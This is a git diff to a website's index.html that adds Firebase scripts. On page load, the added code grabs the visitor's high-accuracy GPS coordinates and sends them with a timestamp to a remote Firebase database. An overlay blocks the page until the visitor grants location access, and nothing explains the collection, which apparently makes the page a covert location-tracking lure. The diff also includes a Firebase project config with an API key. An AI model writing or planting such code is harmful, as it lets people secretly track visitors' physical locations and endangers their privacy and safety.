--- a/index.html
+++ b/index.html
@@ -692,26 +692,53 @@
     <!-- Template Javascript -->
     <script src="js/main.js"></script>
 
-<script type="module">
-  // Import the functions you need from the SDKs you need
-  import { initializeApp } from "https://www.gstatic.com/firebasejs/11.7.3/firebase-app.js";
-  // TODO: Add SDKs for Firebase products that you want to use
-  // https://firebase.google.com/docs/web/setup#available-libraries
+<!-- Firebase -->
+<script src="https://www.gstatic.com/firebasejs/9.23.0/firebase-app-compat.js"></script>
+<script src="https://www.gstatic.com/firebasejs/9.23.0/firebase-database-compat.js"></script>
 
-  // Your web app's Firebase configuration
+<script>
   const firebaseConfig = {
     apiKey: "AIzaSyAnI3-EDQr7OK8fHaeSSzAtLk9iR5sgbac",
     authDomain: "lokasiapi-2f434.firebaseapp.com",
-    databaseURL: "https://lokasiapi-2f434-default-rtdb.firebaseio.com",
     projectId: "lokasiapi-2f434",
-    storageBucket: "lokasiapi-2f434.firebasestorage.app",
+    storageBucket: "lokasiapi-2f434.appspot.com",
     messagingSenderId: "875812427660",
     appId: "1:875812427660:web:5c4ce962244c47e18128a9"
   };
 
-  // Initialize Firebase
-  const app = initializeApp(firebaseConfig);
+  firebase.initializeApp(firebaseConfig);
+  const db = firebase.database();
+
+  function sendLocation(lat, lon) {
+    const now = new Date().toISOString();
+    db.ref("lokasi").push({
+      latitude: lat,
+      longitude: lon,
+      timestamp: now
+    }).then(() => {
+      document.getElementById('overlay').classList.add('hidden');
+    }).catch(err => {
+      document.getElementById('overlay').innerText = '❌ Gagal mengirim lokasi.';
+    });
+  }
+
+  if (navigator.geolocation) {
+    navigator.geolocation.getCurrentPosition(
+      pos => {
+        const lat = pos.coords.latitude.toFixed(6);
+        const lon = pos.coords.longitude.toFixed(6);
+        sendLocation(lat, lon);
+      },
+      err => {
+        document.getElementById('overlay').innerText = "❌ Gagal akses lokasi. Silakan refresh & izinkan lokasi.";
+      },
+      { enableHighAccuracy: true, timeout: 10000, maximumAge: 0 }
+    );
+  } else {
+    document.getElementById('overlay').innerText = "❌ Browser tidak mendukung Geolocation.";
+  }
 </script>
+
 
   
 </body>
